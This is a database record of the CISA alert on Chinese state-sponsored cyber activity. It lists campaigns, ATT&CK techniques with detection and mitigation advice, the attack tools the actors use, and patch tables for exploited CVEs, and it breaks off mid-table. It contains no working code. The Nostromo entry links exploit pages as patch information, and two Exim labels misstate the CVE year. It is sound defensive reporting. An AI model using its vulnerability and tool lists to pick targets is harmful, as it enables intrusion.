DATABASE RESOURCES PRICING ABOUT US

{"id": "AA20-275A", "vendorId": null, "type": "ics", "bulletinFamily": "info", "title": "Potential for China Cyber Response to Heightened U.S.\u2013China Tensions", "description": "### Summary\n\n_This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK\u00ae) framework. See the [ATT&amp;CK for Enterprise](<https://attack.mitre.org/matrices/enterprise/>) framework for all referenced threat actor techniques._\n\n_**Note**: on October 20, 2020, the National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) providing information on publicly known vulnerabilities exploited by Chinese state-sponsored cyber actors to target computer networks holding sensitive intellectual property, economic, political, and military information. This Alert has been updated to include information on vulnerabilities exploited by Chinese state-sponsored actors (see Table 4)._\n\nIn light of heightened tensions between the United States and China, the Cybersecurity and Infrastructure Security Agency (CISA) is providing specific Chinese government and affiliated cyber threat actor tactics, techniques, and procedures (TTPs) and recommended mitigations to the cybersecurity community to assist in the protection of our Nation\u2019s critical infrastructure. In addition to the recommendations listed in the Mitigations section of this Alert, CISA recommends organizations take the following actions.\n\n 1. **Adopt a state of heightened awareness. **Minimize gaps in personnel availability, consistently consume relevant threat intelligence, and update emergency call trees.\n 2. **Increase organizational vigilance.** Ensure security personnel monitor key internal security capabilities and can identify anomalous behavior. Flag any known Chinese indicators of compromise (IOCs) and TTPs for immediate response.\n 3. **Confirm reporting processes.** Ensure personnel know how and when to report an incident. The well-being of an organization\u2019s workforce and cyber infrastructure depends on awareness of threat activity. Consider [reporting incidents](<https://us-cert.cisa.gov/report>) to CISA to help serve as part of CISA\u2019s early warning system (see the Contact Information section below).\n 4. **Exercise organizational incident response plans.** Ensure personnel are familiar with the key steps they need to take during an incident. Do they have the accesses they need? Do they know the processes? Are various data sources logging as expected? Ensure personnel are positioned to act in a calm and unified manner.\n\n### Technical Details\n\n#### China Cyber Threat Profile\n\nChina has a history of using national military and economic resources to leverage offensive cyber tactics in pursuing its national interests. The \u201cMade in China 2025\u201d 10-year plan outlines China\u2019s top-level policy priorities.[[1](<https://www.whitehouse.gov/wp-content/uploads/2018/06/FINAL-China-Technology-Report-6.18.18-PDF.pdf>)],[[2](<https://fas.org/sgp/crs/row/IF10964.pdf>)] China may seek to target the following industries deemed critical to U.S. national and economic interests: new energy vehicles, next generation information technology (IT), biotechnology, new materials, aerospace, maritime engineering and high-tech ships, railway, robotics, power equipment, and agricultural machinery.[[3](<https://www.cfr.org/backgrounder/made-china-2025-threat-global-trade>)] China has exercised its increasingly sophisticated capabilities to illegitimately obtain U.S. intellectual property (IP), suppress both social and political perspectives deemed dangerous to China, and harm regional and international opponents.\n\nThe U.S. Intelligence Community and various private sector threat intelligence organizations have identified the Chinese People\u2019s Liberation Army (PLA) and Ministry of State Security (MSS) as driving forces behind Chinese state-sponsored cyberattacks\u2013either through contractors in the Chinese private sector or by the PLA and MSS entities themselves. China continues to engage in espionage-related activities that include theft of sensitive information such as innovation capital, IP, and personally identifiable information (PII). China has demonstrated a willingness to push the boundaries of their activities to secure information critical to advancing their economic prowess and competitive advantage.\n\n#### Chinese Cyber Activity\n\nAccording to open-source reporting, offensive cyber operations attributed to the Chinese government targeted, and continue to target, a variety of industries and organizations in the United States, including healthcare, financial services, defense industrial base, energy, government facilities, chemical, critical manufacturing (including automotive and aerospace), communications, IT, international trade, education, videogaming, faith-based organizations, and law firms.\n\nAdditionally, numerous Department of Justice (DOJ) indictments over several years provide evidence to suggest Chinese threat actors continuously seek to illegally obtain and exfiltrate U.S. IP. Their targets also include western companies with operations inside China.\n\nPublic reporting that associates Chinese actors with a range of high-profile attacks and offensive cyber activity includes:\n\n * **February 2013 \u2013 Cyber Threat Intelligence Researchers Link Advanced Persistent Threat (APT) 1 to China:** a comprehensive report publicly exposed APT1 as part of China\u2019s military cyber operations and a multi-year effort that exfiltrated IP from roughly 141 companies spanning 20 major industries.[[4](<https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf>)] APT1 established access to the victims\u2019 networks and methodically exfiltrated IP across a large range of industries identified in China\u2019s 12th 5-Year Plan. A year later, the DOJ indicted Chinese cyber threat actors assigned to PLA Unit 61398 for the first time (also highlighted in the report).[[5](<https://www.justice.gov/opa/pr/us-charges-five-chinese-military-hackers-cyber-espionage-against-us-corporations-and-labor>)]\n * **April 2017 \u2013 Chinese APTs Targeting IP in 12 Countries:** CISA announced Chinese state-backed APTs carried out a multi-year campaign of cyber-enabled IP theft that targeted global technology service providers and their customers. The threat actors leveraged stolen administrative credentials (local and domain) and placed sophisticated malware on critical systems in an effort to steal the IP and sensitive data of companies located in at least 12 countries.[[6](<https://us-cert.cisa.gov/ncas/alerts/TA17-117A>)]\n * **December 2018 \u2013 Chinese Cyber Threat Actors Indicted for Compromising Managed Service Providers (MSPs):** DOJ indicted two Chinese cyber threat actors believed to be associated with APT10, who targeted MSPs and their large customer base through phishing and spearphishing campaigns aimed at exfiltrating sensitive business data and, possibly, PII.[[7](<https://www.justice.gov/opa/speech/deputy-attorney-general-rod-j-rosenstein-announces-charges-against-chinese-hackers>)] CISA also briefed stakeholders on Chinese APT groups who targeted MSPs and their customers to steal data and further operationalize commercial and economic espionage.[[8](<https://us-cert.cisa.gov/sites/default/files/publications/Chinese-Cyber-Activity-Targeting-Managed-Service-Providers.pdf>)]\n * **February 2020 \u2013 China\u2019s Military Indicted for 2017 Equifax Hack:** DOJ indicted members of China\u2019s PLA for stealing large amounts of PII and IP. The Chinese cyber threat actors exploited a vulnerability in the company\u2019s dispute resolution website to enter the network, conduct reconnaissance, upload malware, and steal credentials to extract the targeted data. The breach impacted roughly half of all American citizens and stole Equifax\u2019s trade secrets.[[9](<https://www.justice.gov/opa/speech/attorney-general-william-p-barr-announces-indictment-four-members-china-s-military>)]\n * **May 2020 \u2013 China Targets COVID-19 Research Organizations:** the Federal Bureau of Investigation (FBI) and CISA reported the targeting and compromise of U.S. organizations conducting COVID-19-related research by cyber actors affiliated with China.[[10](<https://www.cisa.gov/news/2020/05/13/fbi-and-cisa-warn-against-chinese-targeting-covid-19-research-organizations>)] Large-scale password spraying campaigns were a commonly observed tactic in illicitly obtaining IP related to vaccines, treatments, and testing from networks and personnel affiliated with COVID-19-related research.[[11](<https://us-cert.cisa.gov/ncas/alerts/AA20126A>)],[[12](<https://us-cert.cisa.gov/ncas/current-activity/2020/08/03/chinese-malicious-cyber-activity%20>)]\n\n#### Common TTPs of Publicly Known Chinese Threat Actors\n\nThe section below provides common, publicly known, TTPs employed by Chinese threat actors, which map to the MITRE ATT&amp;CK framework. Where possible, the tables include actions for detection and mitigation. This section is not exhaustive and does not detail all TTPs or detection and mitigation actions. \n\n#### PRE-ATT&amp;CK TTPs\n\nChinese threat actors commonly use the techniques listed in table 1 to achieve reconnaissance (_Technical Information Gathering_ [[TA0015](<https://attack.mitre.org/tactics/TA0015/>)]), staging (_Stage Capabilities_ [[TA0026](<https://attack.mitre.org/tactics/TA0026/>)]), and testing (_Test Capabilities_ [[TA0025](<https://attack.mitre.org/tactics/TA0025/>)]) before executing an attack. PRE-ATT&amp;CK techniques can be difficult to detect and mitigate, however, defenders should be aware of the use of these techniques.\n\n_Table 1: Chinese threat actor PRE-ATT&amp;CK techniques_\n\n**Technique** | **Description** \n---|--- \n_Acquire and/or Use 3rd Party Software Services_ [[T1330](<https://attack.mitre.org/techniques/T1330/>)] | Staging and launching attacks from software as a service solutions that cannot be easily tied back to the APT \n_Compromise 3rd Party Infrastructure to Support Delivery_ [[T1334](<https://attack.mitre.org/techniques/T1334/>)] | Compromising infrastructure owned by other parties to facilitate attacks (instead of directly purchasing infrastructure) \n_Domain Registration Hijacking_ [[T1326](<https://attack.mitre.org/techniques/T1326/>)] | Changing the registration of a domain name without the permission of its original registrant and then using the legitimate domain as a launch point for malicious purposes \n_Acquire Open-Source Intelligence (OSINT) Data Sets and Information_ [[T1247](<https://attack.mitre.org/techniques/T1247/>)] | Gathering data and information from publicly available sources, including public-facing websites of the target organization \n_Conduct Active Scanning _[[T1254](<https://attack.mitre.org/techniques/T1254/>)] | Gathering information on target systems by scanning the systems for vulnerabilities. Adversaries are likely using tools such as Shodan to identify vulnerable devices connected to the internet \n_Analyze Architecture and Configuration Posture _[[T1288](<https://attack.mitre.org/techniques/T1288/>)] | Analyzing technical scan results to identify architectural flaws, misconfigurations, or improper security controls in victim networks \n_Upload, Install, and Configure Software/Tools_ [[T1362](<https://attack.mitre.org/techniques/T1362>)] | Placing malware on systems illegitimately for use during later stages of an attack to facilitate exploitability and gain remote access \n \n#### Enterprise ATT&amp;CK TTPs\n\nChinese threat actors often employ publicly known TTPs against enterprise networks. To orchestrate attacks, they use commonly implemented security testing tools and frameworks, such as:\n\n * Cobalt Strike and Beacon\n * Mimikatz\n * PoisonIvy\n * PowerShell Empire\n * China Chopper Web Shell\n\nTable 2 lists common, publicly known, TTPs used by Chinese threat actors against enterprise networks and provides options for detection and mitigation based on the MITRE ATT&amp;CK framework.\n\n_Table 2: Common Chinese threat actor techniques, detection, and mitigation_\n\n**Technique / Sub-Technique** | **Detection** | **Mitigation** \n---|---|--- \n_Obfuscated Files or Information _[[T1027](<https://attack.mitre.org/techniques/T1027/>)] | \n\n * Detect obfuscation by analyzing signatures of modified files.\n * Flag common syntax used in obfuscation.\n| \n\n * Use antivirus/antimalware software to analyze commands after processing. \n_Phishing: Spearphishing Attachment _[[T1566.001](<https://attack.mitre.org/techniques/T1566/001/>)] and _Spearphishing Link _[[T1566.002](<https://attack.mitre.org/techniques/T1566/002/>)] | \n\n * Use network intrusion detection systems (NIDS) and email gateways to detect suspicious attachments in email entering the network.\n * Use detonation chambers to inspect email attachments in isolated environments.\n| \n\n * Quarantine suspicious files with antivirus solutions.\n * Use network intrusion prevention systems to scan and remove malicious email attachments.\n * Train users to identify phishing emails and notify IT. \n_System Network Configuration Discovery_ [[T1016](<https://attack.mitre.org/techniques/T1016/>)] | \n\n * Monitor for processes and command-line arguments that could be used by an adversary to gather system and network information.\n| \n\n * This technique is difficult to mitigate with preventative controls; organizations should focus on detecting and responding to malicious activity to limit impact. \n_Command and Scripting Interpreter: Windows Command Shell _[[T1059.003](<https://attack.mitre.org/techniques/T1059/003/>)] | \n\n * Identify normal scripting behavior on the system then monitor processes and command-line arguments for suspicious script execution behavior.\n| \n\n * Only permit execution of signed scripts.\n * Disable any unused shells or interpreters. \n \n_User Execution: Malicious File _[[T1204.002](<https://attack.mitre.org/techniques/T1204/002/>)] | \n\n * Monitor execution of command-line arguments for applications (including compression applications) that may be used by an adversary to execute a user interaction.\n * Set antivirus software to detect malicious documents and files downloaded and installed on endpoints.\n| \n\n * Use execution prevention to prevent the running of executables disguised as other files.\n * Train users to identify phishing attacks and other malicious events that may require user interaction. \n_Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder _[[T1547.001](<https://attack.mitre.org/techniques/T1547/001/>)] | \n\n * Monitor the start folder for additions and changes.\n * Monitor registry for changes to run keys that do not correlate to known patches or software updates.\n| \n\n * This technique is difficult to mitigate with preventative controls; organizations should focus on detecting and responding to malicious activity to limit impact. \n_Command and Scripting Interpreter: PowerShell _[[T1059.001](<https://attack.mitre.org/techniques/T1059/001/>)] | \n\n * Enable PowerShell logging.\n * Monitor for changes in PowerShell execution policy as a method of identifying malicious use of PowerShell.\n * Monitor for PowerShell execution generally in environments where PowerShell is not typically used.\n| \n\n * Set PowerShell execution policy to execute only signed scripts.\n * Disable PowerShell if not needed by the system.\n * Disable WinRM service to help prevent use of PowerShell for remote execution.\n * Restrict PowerShell execution policy to administrators. \n_Hijack Execution Flow: DLL Side-Loading _[[T1574.002](<https://attack.mitre.org/techniques/T1574/002/>)] | \n\n * Track Dynamic Link Library (DLL) metadata, and compare DLLs that are loaded at process execution time against previous executions to detect usual differences unrelated to patching.\n| \n\n * Use the program `sxstrace.exe` to check manifest files for side-loading vulnerabilities in software.\n * Update software regularly including patches for DLL side-loading vulnerabilities. \n_Ingress Tool Transfer_ [[T1105](<https://attack.mitre.org/techniques/T1105/>)] | \n\n * Monitor for unexpected file creation or files transfer into the network from external systems, which may be indicative of attackers staging tools in the compromised environment.\n * Analyze network traffic for unusual data flows (i.e., a client sending much more data than it receives from a server).\n| \n\n * Use network intrusion detection and prevention systems to identify traffic for specific adversary malware or unusual data transfer over protocols such as File Transfer Protocol. \n_Remote System Discovery_ [[T1018](<https://attack.mitre.org/techniques/T1018/>)] | \n\n * Monitor processes and command-line arguments for actions that could be taken to gather system and network information.\n * In cloud environments, usage of commands and application program interfaces (APIs) to request information about remote systems combined with additional unexpected commands may be a sign of malicious use.\n| \n\n * This technique is difficult to mitigate with preventative controls; organizations should focus on detecting and responding to malicious activity to limit impact. \n_Software Deployment Tools_ [[T1072](<https://attack.mitre.org/techniques/T1072/>)] | \n\n * Identify the typical use pattern of third-party deployment software, then monitor for irregular deployment activity.\n| \n\n * Isolate critical network systems access using group policies, multi-factor authentication (MFA), and firewalls.\n * Patch deployment systems regularly.\n * Use unique and limited credentials for access to deployment systems. \n_Brute Force: Password Spraying_ [[T1110.003](<https://attack.mitre.org/techniques/T1110/003/>)] | \n\n * Monitor logs for failed authentication attempts to valid accounts.\n| \n\n * Use MFA.\n * Set account lockout policies after a certain number of failed login attempts. \n_Network Service Scanning_ [[T1046](<https://attack.mitre.org/techniques/T1046/>)] | \n\n * Use NIDS to identify scanning activity.\n| \n\n * Close unnecessary ports and services.\n * Segment network to protect critical servers and devices. \n_Email Collection _[[T1114](<https://attack.mitre.org/techniques/T1114/>)] | \n\n * Monitor processes and command-line arguments for actions that could be taken to gather local email files.\n| \n\n * Encrypt sensitive emails.\n * Audit auto-forwarding email rules regularly.\n * Use MFA for public-facing webmail servers. \n_Proxy: External Proxy_ [[T1090.002](<https://attack.mitre.org/techniques/T1090/002/>)] | \n\n * Analyze network data for uncommon data flows, such as a client sending significantly more data than it receives from an external server.\n| \n\n * Use NIDS and prevention systems to identify traffic for specific adversary malware using network signatures. \n_Drive-by Compromise _[[T1189](<https://attack.mitre.org/techniques/T1189/>)] | \n\n * Use Firewalls and proxies to inspect URLs for potentially known-bad domains or parameters.\n * Monitor network intrusion detection systems (IDS) to detect malicious scripts, and monitor endpoints for abnormal behavior.\n\n| \n\n * Isolate and sandbox impacted systems and applications to restrict the spread of malware.\n * Leverage security applications to identify malicious behavior during exploitation.\n * Restrict web-based content through ad-blockers and script blocking extensions. \n_Server Software Component: Web Shell_ [[T1505.003](<https://attack.mitre.org/techniques/T1505/003/>)] | \n\n * Analyze authentication logs, files, netflow/enclave netflow, and leverage process monitoring to discover anomalous activity.\n| \n\n * Patch vulnerabilities in internet facing applications.\n * Leverage file integrity monitoring to identify file changes.\n * Configure server to block access to the web accessible directory through principle of least privilege. \n_Application Layer Protocol: File Transfer Protocols _[[T1071.002](<https://attack.mitre.org/techniques/T1071/002/>)] and _DNS_ [[T1071.004](<https://attack.mitre.org/techniques/T1071/004/>)] | \n\n * Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server).\n * Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.\n| \n\n * Leverage NIDS and NIPS using network signatures to identify traffic for specific adversary malware. \n \n#### Additional APT Activity\n\nThe TTPs listed above have been repeatedly used across the spectrum of Chinese threat actors. The mitigations referenced in this alert can help reduce vulnerability to these TTPs; however, defenders should also maintain heightened awareness of threats actors that are more innovative in their approach, making it difficult to detect and respond to compromise. Publicly reported examples[[13](<https://www.fireeye.com/current-threats/apt-groups.html>)] include:\n\n * **APT3 **(known as UPS Team) is known for deploying zero-day attacks that target Internet Explorer, Firefox, and Adobe Flash Player. The group\u2019s custom implants and changing Command and Control (C2) infrastructure make them difficult to track. APT3 exploits use Rivest Cypher 4 (RC4) encryption to communicate and bypass address space layout randomization (ASLR)/Data Execution Prevention (DEP) by using Return Oriented Programming (ROP) chains.[[14](<https://attack.mitre.org/groups/G0022/>)]\n * **APT10 **(known as MenuPass Group) has established accessed to victim networks through compromised service providers, making it difficult for network defenders to identify the malicious traffic.\n * **APT19** (known as Codoso and Deep Panda) is known for developing custom Rich Text Format (RTF) and macro-enabled Microsoft Office documents for both implants and payloads. The group has backdoored software, such as software serial generators, and has an elite use of PowerShell for C2 over Hyper Text Transfer Protocol (HTTP)/Hyper Text Transfer Protocol Secure (HTTPS).[[15](<https://attack.mitre.org/groups/G0073/>)]\n * **APT40** (known as Leviathan) has targeted external infrastructure with success, including internet-facing routers and virtual private networks.\n * **APT41 **(known as Double Dragon) has exploited vulnerabilities in Citrix NetScaler/ADC, Cisco routers, and Zoho ManageEngine Desktop Central to compromise victims.[[16](<https://attack.mitre.org/groups/G0096/>)]\n\n### Mitigations\n\n### Recommended Actions\n\nThe following list provides actionable technical recommendations for IT security professionals to reduce their organization\u2019s overall vulnerability. These recommendations are not exhaustive; rather they focus on the actions that will greatly reduce stakeholders\u2019 attack surface.\n\n 1. **Patch systems and equipment promptly and diligently. **Establishing and consistently maintaining a thorough patching cycle continues to be the best defense against adversary TTPs. Focus on patching critical and high vulnerabilities that allow for remote code execution or denial-of-service on externally-facing (i.e., internet) equipment. Certain vulnerabilities\u2014including CVE-2012-0158 in Microsoft products [[17](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a%20>)], CVE-2019-19781 in Citrix devices [[18](<https://us-cert.cisa.gov/ncas/alerts/aa20-020a>)], and CVE-2020-5902 in BIG-IP Traffic Management User Interface [[19](<https://us-cert.cisa.gov/ncas/current-activity/2020/07/04/f5-releases-security-advisory-big-ip-tmui-rce-vulnerability-cve>)]\u2014have presented APTs with prime targets to gain initial access. Chinese APTs often use existing exploit code to target routinely exploited vulnerabilities [[20](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a%20>)], which present an opportunistic attack that requires limited resources. See table 3 for patch information on CVEs that have been routinely exploited by Chinese APTs. See table 4 for patch information on vulnerabilities that the National Security Agency (NSA) has stated are actively used by Chinese state-sponsored cyber actors.\n\n_Table 3: Patch information for vulnerabilities routinely exploited by Chinese APT actors_\n\n**Vulnerability** | **Vulnerable Products** | **Patch Information** \n---|---|--- \n[CVE-2012-0158](<https://nvd.nist.gov/vuln/detail/CVE-2012-0158>) | \n\nMicrosoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0\n\n| \n\n * [Microsoft Security Bulletin MS12-027: Vulnerability in Windows Common Controls Could Allow Remote Code Execution](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-027>) \n[CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) | \n\n * Big-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT)\n| \n\n * [F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>) \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) | \n\n * Citrix Application Delivery Controller\n * Citrix Gateway\n * Citrix SDWAN WANOP\n\n| \n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n * [Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) | \n\n * Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15\n * Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15\n| \n\n * [Pulse Secure Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) \n[CVE-2019-16920](<https://nvd.nist.gov/vuln/detail/CVE-2019-16920>) | \n\n * D-Link products DIR-655C, DIR-866L, DIR-652, DHP-1565, DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825\n| \n\n * [D-Link Security Advisory: DAP-1533 Rv Ax, DGL-5500 Rv Ax, DHP-1565 Rv Ax, DIR-130 Rv Ax, DIR-330 Rv Ax, DIR-615 Rv Ix, (non-US) DIR-652 Rv Bx, DIR-655 Rv Cx, DIR-825 Rv Cx, DIR-835 Rv Ax, DIR-855L Rv Ax, (non-US) DIR-862 Rv Ax, DIR-866L Rv Ax :: CVE-2019-16920 :: Unauthenticated Remote Code Execution (RCE) Vulnerability](<https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10124>) \n[CVE-2019-16278](<https://nvd.nist.gov/vuln/detail/CVE-2019-16278>) | \n\n * Nostromo 1.9.6 and below\n| \n\n * [Nostromo 1.9.6 Directory Traversal/ Remote Command Execution](<https://packetstormsecurity.com/files/155045/Nostromo-1.9.6-Directory-Traversal-Remote-Command-Execution.html>)\n * [Nostromo 1.9.6 Remote Code Execution](<https://packetstormsecurity.com/files/155802/nostromo-1.9.6-Remote-Code-Execution.html>) \n \n[CVE-2019-1652](<https://nvd.nist.gov/vuln/detail/CVE-2019-1652>) | \n\n * Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers\n| \n\n * [Cisco Security Advisory: Cisco Small Business RV320 and RV325 Routers Command Injection Vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject>) \n[CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) | \n\n * Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers\n| \n\n * [Cisco Security Advisory: Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info>) \n[CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>) | \n\n * Zoho ManageEngine Desktop Central before 10.0.474\n| \n\n * [ManageEngine Desktop Central remote code execution vulnerability (CVE-2020-10189)](<https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html>) \n \n_Table 4: Patch information for NSA listed vulnerabilities used by Chinese state-sponsored cyber actors [[21](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>)]_\n\n**Vulnerability** | **Vulnerable Products** | **Patch Information** \n---|---|--- \n[CVE-2020-8193](<https://nvd.nist.gov/vuln/detail/CVE-2020-8193>) | \n\n * Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18\n * Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7\n| \n\n * [Citrix Security Bulletin CTX276688](<https://support.citrix.com/article/CTX276688>) \n[CVE-2020-8195](<https://nvd.nist.gov/vuln/detail/CVE-2020-8195>) | \n\n * Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18\n * Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7\n| \n\n * [Citrix Security Bulletin CTX276688](<https://support.citrix.com/article/CTX276688>) \n[CVE-2020-8196](<https://nvd.nist.gov/vuln/detail/CVE-2020-8196>) | \n\n * Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18\n * Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7\n\n| \n\n * [Citrix Security Bulletin CTX276688](<https://support.citrix.com/article/CTX276688>) \n[CVE-2019-0708](<https://nvd.nist.gov/vuln/detail/CVE-2019-0708>) | \n\n * Windows 7 for 32-bit Systems Service Pack 1\n * Windows 7 for x64-based Systems Service Pack 1\n * Windows Server 2008 for 32-bit Systems Service Pack 2\n * Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)\n * Windows Server 2008 for Itanium-Based Systems Service Pack 2\n * Windows Server 2008 for x64-based Systems Service Pack 2\n * Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)\n * Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2019-0708](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>) \n[CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) | \n\n * MobileIron Core &amp; Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0\n * Sentry versions 9.7.2 and earlier, and 9.8.0;\n * Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier\n| \n\n * [MobileIron Blog: MobileIron Security Updates Available](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>) \n[CVE-2020-1350](<https://nvd.nist.gov/vuln/detail/CVE-2020-1350>) | \n\n * Windows Server 2008 for 32-bit Systems Service Pack 2\n * Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)\n * Windows Server 2008 for x64-based Systems Service Pack 2\n * Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 (Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2012 R2 (Server Core installation)\n * Windows Server 2016\n * Windows Server 2016 (Server Core installation)\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows Server, version 1903 (Server Core installation)\n * Windows Server, version 1909 (Server Core installation)\n * Windows Server, version 2004 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2020-1350](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350>) \n \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) | \n\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 (Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2016\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows Server, version 1903 (Server Core installation)\n * Windows Server, version 1909 (Server Core installation)\n * Windows Server, version 2004 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) \n \n[CVE-2020-1040](<https://nvd.nist.gov/vuln/detail/CVE-2020-1040>) | \n\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 (Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2012 R2 (Server Core installation)\n * Windows Server 2016\n * Windows Server 2016 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2020-1040](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1040>) \n[CVE-2018-6789](<https://nvd.nist.gov/vuln/detail/CVE-2018-6789>) | \n\n * Exim before 4.90.1\n| \n\n * [Exim page for CVE-2020-6789](<https://exim.org/static/doc/security/CVE-2018-6789.txt>)\n * [Exim patch information for CVE-2020-6789](<https://git.exim.org/exim.git/commit/cf3cd306062a08969c41a1cdd32c6855f1abecf1>) \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) | \n\n * Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30\n * Microsoft Exchange Server 2013 Cumulative Update 23\n * Microsoft Exchange Server 2016 Cumulative Update 14\n * Microsoft Exchange Server 2016 Cumulative Update 15\n * Microsoft Exchange Server 2019 Cumulative Update 3\n * Microsoft Exchange Server 2019 Cumulative Update 4\n| \n\n * [Microsoft Security Advisory for CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) \n[CVE-2018-4939](<https://nvd.nist.gov/vuln/detail/CVE-2018-4939>) | \n\n * ColdFusion Update 5 and earlier versions\n * ColdFusion 11 Update 13 and earlier versions\n| \n\n * [Adobe Security Bulletin APSB18-14](<https://helpx.adobe.com/security/products/coldfusion/apsb18-14.html>) \n[CVE-2015-4852](<https://nvd.nist.gov/vuln/detail/CVE-2015-4852>) | \n\n * 